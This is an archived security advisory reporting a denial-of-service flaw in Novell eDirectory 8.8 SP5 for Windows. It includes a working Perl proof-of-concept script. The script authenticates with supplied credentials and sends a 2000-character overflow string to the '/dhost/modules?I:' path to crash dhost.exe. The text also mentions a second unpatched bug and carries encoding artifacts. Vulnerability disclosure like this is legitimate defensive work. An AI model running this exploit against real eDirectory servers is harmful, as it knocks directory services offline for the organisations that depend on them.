TUCoPS :: Networks :: bt-21966.htm

Novell eDirectory 8.8 SP5 Denial of Service
Novell eDirectory 8.8 SP5 Denial of Service
Novell eDirectory 8.8 SP5 Denial of Service



Product:=0D
Novell eDirectory 8.8 sp5 for Windows=0D
=0D
=0D
********************************************************************************=0D
Vulnerability:=0D
Denial of Service=0D
=0D
=0D
=0D
********************************************************************************=0D
Discussion:=0D
Vulnerability in '/dhost/modules?I:'=0D
Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)=0D
Also in last weeks published another bug in 'modules?L:'=0D
It is not patched yet too..=0D
=0D
=0D
=0D
********************************************************************************=0D
Credits:=0D
HACKATTACK IT SECURITY GmbH=0D
Penetration Testing in Deutschland - =D6sterreich - Schweiz=0D
www.hackattack.com=0D 
=0D
=0D
=0D
********************************************************************************=0D
=0D
Original Advisory=0D
www.hackattack.com=0D 
=0D
=0D
=0D
********************************************************************************=0D
PoC:=0D
=0D
#!usr\bin\perl=0D
#Vulnerability has found by HACKATTACK=0D
=0D
use WWW::Mechanize; =0D
=0D
use LWP::Debug qw(+);=0D
=0D
use HTTP::Cookies;=0D
=0D
$address=$ARGV[0]; =0D
=0D
=0D
if(!$ARGV[0]){=0D
=0D
        print "Usage:perl $0 address\n";=0D
	=0D
exit();=0D
}=0D
=0D
=0D
=0D
$login = "$address/_LOGIN_SERVER_";=0D
=0D
$url = "$address/dhost/";=0D
=0D
$module = "modules?I:";=0D
=0D
$buffer = "A" x 2000;=0D
=0D
=0D
$vuln = $module.$buffer;=0D
=0D
#Edit the username and password.=0D
=0D
	  $user = "username";=0D
 =0D
 	  $pass = "password"; =0D
=0D
#Edit the username and password.=0D
 =0D
my $mechanize = WWW::Mechanize->new();=0D
=0D
=0D
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));=0D
=0D
=0D
$mechanize->timeout($url_timeout); =0D
=0D
$res = $mechanize->request(HTTP::Request->new('GET', "$login")); =0D
=0D
=0D
    $mechanize->submit_form( =0D
=0D
                  form_name => "authenticator", =0D
=0D
                  fields    => {        =0D
            =0D
                     usr => $user, =0D
=0D
                     pwd => $pass}, =0D
=0D
                     button => 'Login'); =0D
=0D
$response2 = $mechanize->get("$url$vuln");=0D
=0D
=0D
About HACKATTACK=0D
=================0D
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria=0D
=0D
=0D
More Information about HACKATTACK at=0D
http://www.hackattack.com=0D 
=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH